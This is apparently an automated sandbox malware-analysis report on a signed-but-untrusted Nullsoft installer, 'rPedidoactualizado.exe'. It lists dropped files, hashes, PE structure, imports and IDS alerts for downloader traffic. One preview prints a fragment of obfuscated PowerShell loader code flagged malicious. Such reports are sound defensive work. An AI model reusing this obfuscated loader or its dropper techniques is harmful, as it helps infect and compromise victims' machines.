	ArT23Ix6Ox.exe	Get hash	malicious	Unknown	Browse	216.58.206.65 216.58.206.46
	cqKYl7T4CR.exe	Get hash	malicious	Unknown	Browse	216.58.206.65 216.58.206.46
	SecuriteInfo.com.FileRepMalware.12793.28433.exe	Get hash	malicious	Remcos, GuLoader	Browse	216.58.206.65 216.58.206.46
	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	216.58.206.65 216.58.206.46
	WiTqtf1aiE.exe	Get hash	malicious	LummaC, Vidar	Browse	216.58.206.65 216.58.206.46
	out.exe	Get hash	malicious	Vidar	Browse	216.58.206.65 216.58.206.46
	PEDIDO-144848.exe	Get hash	malicious	FormBook, GuLoader	Browse	216.58.206.65 216.58.206.46

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1z4idokb.q3f.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3duzehv.u43.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lpta4ulm.qnx.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vzkhcuw1.u5x.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Bevidstgjorde.ren

Download File

Process:	C:\Users\user\Desktop\rPedidoactualizado.exe
File Type:	data
Category:	dropped
Size (bytes):	478461
Entropy (8bit):	1.2475162534380173
Encrypted:	false
SSDEEP:	1536:R/xRunV7hsXgfAfBz7Wr/dIoM1mI/hqrJPNOeam:1SV7bYfp7QIT41N2
MD5:	BF4A008DC0B6586BA5DC8205FFC7DF72
SHA1:	0D84F9EF7D25DAB9667BEA1FCD6892621B5BD404
SHA-256:	497253D655FA9BDCDF3058A1092EA37C5954FB532ED86F04DE1C7121784D1EA7
SHA-512:	71EDACB5E8E860D1D936F152C20609DEAD0E9F388099F2DD33D41DDBF2EA1AFB58A2C6BFFC484C2DF7565AF9C294F2C0D2F86AAA4740F19FDE1FE8A8B821F78B
Malicious:	false
Preview:	.._.`...............................................i.........................................`.........f...................Q................................M.....r..............^....................................4......................................................................O...=.h.........................q..X...............S........................\|..........................................................................................................r.).....................a......................W...................X...........................................................M.. ...............3...........<....y........x....I..............................I~..................o..........................................@..........................................D..............................................................Q.....................................................c.......i.......................................................................)...............,...

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon

Download File

Process:	C:\Users\user\Desktop\rPedidoactualizado.exe
File Type:	ASCII text, with very long lines (3251), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	55589
Entropy (8bit):	5.3395961193086965
Encrypted:	false
SSDEEP:	768:QAoFdvSL7MvM2z7oL9J6Hugxtzh95SOcntjnW2e/tRG1+uYZmB875K0xU3l:qFdvShLnUugxtt9unk4YmBcw7l
MD5:	D418CF28E87B5EDF54FF46E06525D8AD
SHA1:	7BF3FA4495E0A54065BE917A14018EA057C76991
SHA-256:	7EB26D39AE073029CD5248C90835745BAAD3FB0BEA886092536E3E78BB157B77
SHA-512:	9A504051B8A48DBC9BD8B4E4E3281928FB84B4443C5F4398DC37397CE9E5C6AE63B04DC56F30BD0FB019157639C1882903231DCF80A356164C85EBDD1EF82E3E
Malicious:	true
Preview:	$Hamantasch=$Tvrretning;..<#Fireworms Tinwoman Taxiflyvningens Tsedrengene Krydsogtvrser #>..<#Alderdomshjemmene Kostaldes Systempartneren Brintionernes Storyboard Melioratively #>..<#Judicative Bardunernes Underslbenes Delegationernes Mdestederne Snagbush Gyrostabilizer #>..<#Aluminiumstrykkene Cobewail Prosiest #>..<#Hault Underinddele Crocodility Mases Basiliscine Fartberuset Hjttalerdrift #>..<#bolstrene Prunella Admiralsuniformernes Vejbane Dubberen #>...$Enhedselementer = @'.Luder.Batbo$,rkssCStvleo KneenAr.ads Nonwe repecPippiuCrypttRa.sii SarkvTrlleeChok,sFokke2Youth4motiv0Klaner UndioOverbcNyhedh noxaStadsnIntrutNondu=Chrom$ExubeGDott.l Augua commsNonimfPranciSkarnbP anieLackwrPodoseSizinnGrammsS mal;Legem.LimacfMech.uForvenAd,atc,eleft vinei sko.oSprinnSnipt PrelaUMinusnVoc tbBerlieR,gnsl A priskrlee RedovKont aRomanbBogenlRebiaeAdminn Sty,eWashtsS,yrksFigen Indsb(Runds$SelvhFBerriuDr.chn Dolmk triktC rkui oncoArbejnAd essVermitRreddeRaasygFagstn eltoiDepaynUnveig LenseS.bl

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Unlawfulness.Non

Download File

Process:	C:\Users\user\Desktop\rPedidoactualizado.exe
File Type:	data
Category:	dropped
Size (bytes):	348419
Entropy (8bit):	7.657261397118454
Encrypted:	false
SSDEEP:	6144:xyb8l6jMLDiGZHflnNZxSyR/g7HublX6kMGaASNwgU5yZuNUt:Hl6jgDigflPbR/gCbl6OoNwgbZuN+
MD5:	F91262C1C4EED426F8350D887419D829
SHA1:	30159757E0411E591793E0398504EA61ED602963
SHA-256:	86BE99DEC5C5B03DA5FB5C1CC20A08696BCD88A4BAE0E1E4B89614DA6F66DA65
SHA-512:	F8FCA2001BAA9412DF83E223A2B5DF309A6C2D1379F82B3CF5F433F3F819CF661E37E9D7E6828BDA2202FF3D8E288CD03084F7883999A5E548EBCCDABD584F02
Malicious:	false
Preview:	.Q....-.@@@..............H......H..y.k.9.........P.lll..................)..33.........*.......................................................%................K.....FF..DD......hh.........................................\|\|\|..=..............e.................................d..........................X.......................___.....SSSS.L.............\..~...++..............................U..............AA.........ll....I...ll....t..aaaaa............._...........;;.8...........Z.......$.11....II........................1................&....""...........................................///.......@........#.N...3.................R....5.......Y.................Z..xxx...............MMMMMM.........................P.O...F.2......```.....................oo........o......___..........C....AA.....$$.....h.................;;............ZZZZ.s.....@...........9..........\........&&&....//..D.d........88....(....#..........:.................}}}}}.S...............3..............M..........i.///////

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Yellowfin.pre

Download File

Process:	C:\Users\user\Desktop\rPedidoactualizado.exe
File Type:	data
Category:	dropped
Size (bytes):	436009
Entropy (8bit):	1.2582605930205382
Encrypted:	false
SSDEEP:	768:hcdhFKp23vdhctpU19YKVceNXiajgLRY2hLsKf/LTWSs9D1bFuYRiQHlWrmcZE+t:T9ogp/vuFYha+YI6vuAYskfI2ByWSlq
MD5:	BA41A53F0CE12BDF6DDE858C1BB56E67
SHA1:	28CC8982281E9540750800B87B128ACF3E86E1B4
SHA-256:	0DDFC3936461A4A299A8B57D2EE5A4C11B057233AE905D2EBBB3641E4D9FD0CE
SHA-512:	77DDDF113CB001D489B2B4B39E5E953B03A76D72EEABAB0C82FFA8C8E1677755A75740A98D32871CB086AE65B0BD2EEE1319BD87C59CC98169ECBE60EE83348E
Malicious:	false
Preview:	.............;......................0........;.......................jh<.i....................................................B................O.(...................................................................................M....6....................c.............................:............A.........................#............@...............................................................................I...........\..........................k..................................H.............................................................................1.......l....?.[....................)*....~..........K..................................................D..................U.a............................C........................................................................=.............o.........................g...............1.......s..H................y.................t....[.....................i..........'p.................................g.....................$......

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\kakaosmrs.txt

Download File

Process:	C:\Users\user\Desktop\rPedidoactualizado.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	356
Entropy (8bit):	4.234486179912683
Encrypted:	false
SSDEEP:	6:URWM/KBzGLFXivfRO5BViaS035LKlewERn62GFVhyzpFiqizhRc48RV1CnmMWIX+:UkgK4Lg3ROI0pLYT4Ahj3zKRV67WIXC7
MD5:	E514D8FDFF4A7AC568F2DED93DADB44E
SHA1:	DF81016124C8941F2D9F75B1BCB3D951F911626C
SHA-256:	687D18EA6077CE147AC2358AEF39F33119CC6C46A0A38C46AE444E75F595EE74
SHA-512:	E6E8734937C7F6CDF0FA3F25861A42CE31485555EF236B2922C0E90AA22C1B2D4BBB757AA13BF9C41948DAC261CF042565D2608074246000D479B143962B4CF3
Malicious:	false
Preview:	udkrystallisations kubong palisse duodesen raadighedsbelbene monoamino..hookman damperens varsel.endetarmsaabningens lection udvidelsestakts statometer diggers scandalized,ectocarpaceous carosella drattede stodderprinsen gingkoes,afvrgelsernes moravianized skotte.udsalgssteder fayal uafmrket svampelagenes mispronouncement forhaeng modemerne deskription..

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\rPedidoactualizado.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	692288
Entropy (8bit):	7.748225458784468
Encrypted:	false
SSDEEP:	12288:M2QJ9o2sW3B9o2G2/6SkwQtkmDnzCDJyVlk78A7RN9qqhyWjX53XO3:Mv9o2sW3B9oV2iSkwQKmKDd7FN9LhyaW
MD5:	E3CA439A218A7EEB9432B91FBF185559
SHA1:	5A55427C13737EA23773FF25476C0590C8EC9B4B
SHA-256:	A73A2597CBB4D6A76B2AB9D0664E79AD99D257AAB4683F7C68DD1321FA79F34B
SHA-512:	84135FA90268A569C1AFD2A9C0F6F29F69009028D3F646CBDE72AC7992E6F71D84C59288B1F55672693085CB6C2885A6808CD364692E36DB80E08CE9F311BC04
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5% Antivirus: Virustotal, Detection: 14%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:.....l3............@...........................?.....F.....@..........................................@=..\|...........................................................................................................text....d.......d.................. ..`.rdata...............h..............@..@.data...8.9..........\|..............@....ndata........:..........................rsrc....\|...@=..~..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\rPedidoactualizado.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.748225458784468
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	rPedidoactualizado.exe
File size:	692'288 bytes
MD5:	e3ca439a218a7eeb9432b91fbf185559
SHA1:	5a55427c13737ea23773ff25476c0590c8ec9b4b
SHA256:	a73a2597cbb4d6a76b2ab9d0664e79ad99d257aab4683f7c68dd1321fa79f34b
SHA512:	84135fa90268a569c1afd2a9c0f6f29f69009028d3f646cbde72ac7992e6f71d84c59288b1f55672693085cb6c2885a6808cd364692e36db80e08ce9f311bc04
SSDEEP:	12288:M2QJ9o2sW3B9o2G2/6SkwQtkmDnzCDJyVlk78A7RN9qqhyWjX53XO3:Mv9o2sW3B9oV2iSkwQKmKDd7FN9LhyaW
TLSH:	12E41219B250C1ABD6E5B13489A6DB58D877BCB49C62064B32D43BCDEE7EB106C4F807
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....

File Icon


Icon Hash:	397d694151710f3c

Static PE Info

General

Entrypoint:	0x40336c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Undersally Macusi ", E=hematologies@Gymnasts.ha, L=Paris 15, S=\xcele-de-France, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	23/05/2024 04:37:18 23/05/2027 04:37:18
Subject Chain	CN="Undersally Macusi ", E=hematologies@Gymnasts.ha, L=Paris 15, S=\xcele-de-France, C=FR
Version:	3
Thumbprint MD5:	99441D692D47D348DF593FEC580DF502
Thumbprint SHA-1:	D4C30401BEA9C2A77E7E5C55B2B820D93E8B6613
Thumbprint SHA-256:	7E8F9E425BA0161F88E44144109BEF33F4F4F1E9CD0AFC57A80C91AB7462D9C8
Serial:	5BB39523F95B3327628DF53C7CEFCC4D0549983A

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [007A8A2Ch], eax
je 00007FB09CBCA143h
push ebx
call 00007FB09CBCD3F5h
cmp eax, ebx
je 00007FB09CBCA139h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007FB09CBCD36Fh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FB09CBCA11Ch
push 0000000Ah
call 00007FB09CBCD3C8h
push 00000008h
call 00007FB09CBCD3C1h
push 00000006h
mov dword ptr [007A8A24h], eax
call 00007FB09CBCD3B5h
cmp eax, ebx
je 00007FB09CBCA141h
push 0000001Eh
call eax
test eax, eax
je 00007FB09CBCA139h
or byte ptr [007A8A2Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [007A8AF8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0079FEE0h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3d4000	0x27cc0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xa86a0	0x9a0	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6400	0x6400	eed0986138e3ef22dbb386f4760a55c0	False	0.6783203125	data	6.511089687733535	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x138e	0x1400	2914bac53cd4485c9822093463e4eea6	False	0.4509765625	data	5.146454805063938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39eb38	0x600	09e0c528682cd2747c63b7ba39c2cc23	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x2b000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3d4000	0x27cc0	0x27e00	3ff3f9c979a556a14466f3e7fca5a16a	False	0.5468566320532915	data	6.448700520091383	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3d4448	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.2851798178161599
RT_ICON	0x3e4c70	0xb85c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9977328587168404
RT_ICON	0x3f04d0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.4055857345299953
RT_ICON	0x3f46f8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.48091286307053943
RT_ICON	0x3f6ca0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6081144465290806
RT_ICON	0x3f7d48	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.5914179104477612
RT_ICON	0x3f8bf0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6864754098360656
RT_ICON	0x3f9578	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.7044223826714802
RT_ICON	0x3f9e20	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.4371951219512195
RT_ICON	0x3fa488	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.5173410404624278
RT_ICON	0x3fa9f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8156028368794326
RT_ICON	0x3fae58	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.5255376344086021
RT_ICON	0x3fb140	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.6418918918918919
RT_DIALOG	0x3fb268	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x3fb388	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3fb4a8	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x3fb570	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3fb5d0	0xbc	data	English	United States	0.648936170212766
RT_VERSION	0x3fb690	0x2f0	SysEx File - IDP	English	United States	0.4773936170212766
RT_MANIFEST	0x3fb980	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-08T03:32:34.090406+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49828	216.58.206.46	443	TCP
2024-10-08T03:32:40.146299+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49864	158.101.44.242	80	TCP
2024-10-08T03:32:41.240068+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49864	158.101.44.242	80	TCP
2024-10-08T03:32:41.815821+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49886	188.114.96.3	443	TCP
2024-10-08T03:32:43.458901+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49892	158.101.44.242	80	TCP
2024-10-08T03:32:46.415577+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49922	188.114.96.3	443	TCP
2024-10-08T03:32:47.604805+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49932	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 03:32:33.058677912 CEST	49828	443	192.168.2.5	216.58.206.46
Oct 8, 2024 03:32:33.058717966 CEST	443	49828	216.58.206.46	192.168.2.5
Oct 8, 2024 03:32:33.058819056 CEST	49828	443	192.168.2.5	216.58.206.46
Oct 8, 2024 03:32:33.067900896 CEST	49828	443	192.168.2.5	216.58.206.46
Oct 8, 2024 03:32:33.067930937 CEST	443	49828	216.58.206.46	192.168.2.5
Oct 8, 2024 03:32:33.709824085 CEST	443	49828	216.58.206.46	192.168.2.5
Oct 8, 2024 03:32:33.709902048 CEST	49828	443	192.168.2.5	216.58.206.46
Oct 8, 2024 03:32:33.710887909 CEST	443	49828	216.58.206.46	192.168.2.5
Oct 8, 2024 03:32:33.710951090 CEST	49828	443	192.168.2.5	216.58.206.46
